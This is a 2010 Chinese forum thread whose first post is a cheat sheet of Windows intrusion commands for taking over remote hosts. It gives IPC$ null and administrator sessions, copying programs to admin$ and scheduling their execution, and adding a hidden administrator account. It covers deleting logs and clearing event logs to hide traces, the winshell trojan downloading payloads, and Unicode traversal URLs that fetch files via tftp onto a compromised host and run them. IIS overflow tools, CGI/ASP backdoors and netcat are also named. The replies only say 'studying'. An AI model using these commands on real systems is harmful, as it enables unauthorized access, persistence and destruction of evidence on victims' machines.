切换到宽版
  • 2540阅读
  • 3回复

[小常识]网管和黑客都必须知道的命令 [复制链接]

上一主题 下一主题
 

发帖
265
金钱
1814
贡献值
25
交易币
0
好评度
63
家乡
广东河源紫金县附城上庄村官坑组
性别
只看楼主 倒序阅读 使用道具 楼主  发表于: 2010-07-25
网管和黑客都必须知道的命令 FGDVBUY@  
FGDVBUY@  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" FGDVBUY@  
FGDVBUY@  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" FGDVBUY@  
FGDVBUY@  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ FGDVBUY@  
FGDVBUY@  
(查看远程主机时间) net time \\IP地址 FGDVBUY@  
FGDVBUY@  
(定时启动某个程序) at \\IP地址 02:18 readme.exe FGDVBUY@  
FGDVBUY@  
(查看共享) net view \\IP地址 FGDVBUY@  
FGDVBUY@  
(查看netbios工作组列表) nbtstat -A IP地址 FGDVBUY@  
FGDVBUY@  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" FGDVBUY@  
FGDVBUY@  
(这两条把自己增加到管理员组): net user 用户名 密码 /add FGDVBUY@  
FGDVBUY@  
net localgroup Administrators 用户名 /add FGDVBUY@  
FGDVBUY@  
(断开连接) net use \\IP地址\ipc$ /delete FGDVBUY@  
FGDVBUY@  
===================================================== FGDVBUY@  
FGDVBUY@  
擦屁屁: FGDVBUY@  
FGDVBUY@  
del C:\winnt\system32\logfiles\*.* FGDVBUY@  
FGDVBUY@  
del C:\winnt\ssytem32\config\*.evt FGDVBUY@  
FGDVBUY@  
del C:\winnt\system32\dtclog\*.* FGDVBUY@  
FGDVBUY@  
del C:\winnt\system32\*.log FGDVBUY@  
FGDVBUY@  
del C:\winnt\system32\*.txt FGDVBUY@  
FGDVBUY@  
del C:\winnt\*.txt FGDVBUY@  
FGDVBUY@  
del C:\winnt\*.log FGDVBUY@  
FGDVBUY@  
============================ FGDVBUY@  
FGDVBUY@  
一、netsvc.exe FGDVBUY@  
FGDVBUY@  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: FGDVBUY@  
FGDVBUY@  
netsvc /list \\IP地址 FGDVBUY@  
FGDVBUY@  
netsvc schedule \\IP地址 /query FGDVBUY@  
FGDVBUY@  
netsvc \\IP地址 schedule /start FGDVBUY@  
FGDVBUY@  
二、OpenTelnet.exe FGDVBUY@  
FGDVBUY@  
远程启动主机的Telnet服务,并绑定端口到7878,例如: FGDVBUY@  
FGDVBUY@  
OpenTelnet \\IP地址 用户名 密码 1 7878 FGDVBUY@  
FGDVBUY@  
然后就可以telnet到主机的7878端口,进入DOS方式下: FGDVBUY@  
FGDVBUY@  
telnet IP地址 7878 FGDVBUY@  
FGDVBUY@  
三、winshell.exe FGDVBUY@  
FGDVBUY@  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: FGDVBUY@  
FGDVBUY@  
p Path (查看winshell主程序的路径信息) FGDVBUY@  
FGDVBUY@  
b reBoot (重新启动机器) FGDVBUY@  
FGDVBUY@  
d shutDown (关闭机器) FGDVBUY@  
FGDVBUY@  
s Shell (执行后你就会看到可爱的“C:\>”) FGDVBUY@  
FGDVBUY@  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) FGDVBUY@  
FGDVBUY@  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) FGDVBUY@  
FGDVBUY@  
四、3389登陆器,GUI方式登录远程主机的 FGDVBUY@  
FGDVBUY@  
五、elsave.exe FGDVBUY@  
FGDVBUY@  
事件日志清除工具 FGDVBUY@  
FGDVBUY@  
elsave -s \\IP地址 -l "application" -C FGDVBUY@  
FGDVBUY@  
elsave -s \\IP地址 -l "system" -C FGDVBUY@  
FGDVBUY@  
elsave -s \\IP地址 -l "security" -C FGDVBUY@  
FGDVBUY@  
执行后成功清除应用程序日志,系统日志,安全日志 FGDVBUY@  
FGDVBUY@  
六、hbulot.exe FGDVBUY@  
FGDVBUY@  
开启win2kserver和winxp的3389服务 FGDVBUY@  
FGDVBUY@  
hbulot [/r] FGDVBUY@  
FGDVBUY@  
使用/r表示安装完成后自动重起目标使设置生效。 FGDVBUY@  
FGDVBUY@  
七、nc.exe(netcat.exe) FGDVBUY@  
FGDVBUY@  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 FGDVBUY@  
FGDVBUY@  
想要连接到某处: nc [-options] hostname port[s] [ports] ... FGDVBUY@  
FGDVBUY@  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] FGDVBUY@  
FGDVBUY@  
参数: FGDVBUY@  
FGDVBUY@  
-e prog 程序重定向,一旦连接,就执行 [危险!!] FGDVBUY@  
FGDVBUY@  
-g gateway source-routing hop point[s], up to 8 FGDVBUY@  
FGDVBUY@  
-G num source-routing pointer: 4, 8, 12, ... FGDVBUY@  
FGDVBUY@  
-h 帮助信息 FGDVBUY@  
FGDVBUY@  
-i secs 延时的间隔 FGDVBUY@  
FGDVBUY@  
-l 监听模式,用于入站连接 FGDVBUY@  
FGDVBUY@  
-n 指定数字的IP地址,不能用hostname FGDVBUY@  
FGDVBUY@  
-o file 记录16进制的传输 FGDVBUY@  
FGDVBUY@  
-p port 本地端口号 FGDVBUY@  
FGDVBUY@  
-r 任意指定本地及远程端口 FGDVBUY@  
FGDVBUY@  
-s addr 本地源地址 FGDVBUY@  
FGDVBUY@  
-u UDP模式 FGDVBUY@  
FGDVBUY@  
-v 详细输出——用两个-v可得到更详细的内容 FGDVBUY@  
FGDVBUY@  
-w secs timeout的时间 FGDVBUY@  
FGDVBUY@  
-z 将输入输出关掉——用于扫描时 FGDVBUY@  
FGDVBUY@  
八、TFTPD32.EXE FGDVBUY@  
FGDVBUY@  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: FGDVBUY@  
FGDVBUY@  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 FGDVBUY@  
FGDVBUY@  
然后可以直接令文件运行: FGDVBUY@  
FGDVBUY@  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 FGDVBUY@  
FGDVBUY@  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 ]7kq@o/7  
]7kq@o/7  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 ]7kq@o/7  
]7kq@o/7  
一、一 Xscan命令行运行参数说明: ]7kq@o/7  
]7kq@o/7  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 ]7kq@o/7  
]7kq@o/7  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] ]7kq@o/7  
]7kq@o/7  
xscan -file <主机列表文件名> <检测项目> [其他选项] ]7kq@o/7  
]7kq@o/7  
其中<检测项目> 含义如下: ]7kq@o/7  
]7kq@o/7  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); ]7kq@o/7  
]7kq@o/7  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); ]7kq@o/7  
]7kq@o/7  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); ]7kq@o/7  
]7kq@o/7  
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); ]7kq@o/7  
]7kq@o/7  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); ]7kq@o/7  
]7kq@o/7  
[其他选项] 含义如下: ]7kq@o/7  
]7kq@o/7  
-v: 显示详细扫描进度 ]7kq@o/7  
]7kq@o/7  
-p: 跳过Ping不通的主机 ]7kq@o/7  
]7kq@o/7  
-o: 跳过没有检测到开放端口的主机 ]7kq@o/7  
]7kq@o/7  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10 ]7kq@o/7  
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
离线游德炎

发帖
685
金钱
9142
贡献值
9
交易币
2
好评度
58
家乡
福建永定大溪
性别
只看该作者 沙发  发表于: 2010-07-25
学习~~~
游德炎
离线游成锋

发帖
910
金钱
10857
贡献值
303
交易币
3
好评度
270
家乡
QQ34562808
性别
只看该作者 板凳  发表于: 2010-07-25
学习中
欢迎光临:我的网店-诺亚方舟百货
http://shop33764956.taobao.com/
离线游大亮

发帖
7461
金钱
12
贡献值
3313
交易币
246
好评度
586
家乡
江西省抚州市南城县新丰街镇梅溪村界潭堡
性别
只看该作者 地板  发表于: 2010-07-25
可我就可以不知道!够帅吧!坐一坐!歇吧!
真诚相识,真诚相见,真诚相遇,真诚相助。
快速回复
限100 字节
 
上一个 下一个